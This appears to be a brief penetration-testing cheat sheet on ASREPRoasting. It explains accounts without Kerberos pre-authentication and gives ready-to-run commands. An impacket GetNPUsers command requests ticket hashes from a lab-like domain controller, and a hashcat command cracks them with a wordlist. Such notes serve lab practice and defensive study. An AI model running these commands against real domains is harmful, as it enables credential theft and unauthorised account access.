ASREPRoasting¶
Abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
ASREPRoasting with GetNPUsers.py¶
GetNPUsers.py is a script that can be used to request Kerberos tickets without pre-authentication. This script is part of the impacket suite.
impacket-GetNPUsers -usersfile valid_users -dc-ip 10.10.125.64 -format hashcat -outputfile hashes.txt spookysec.local/
Once you have the hashes, you can crack them with hashcat.
hashcat -m 18200 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt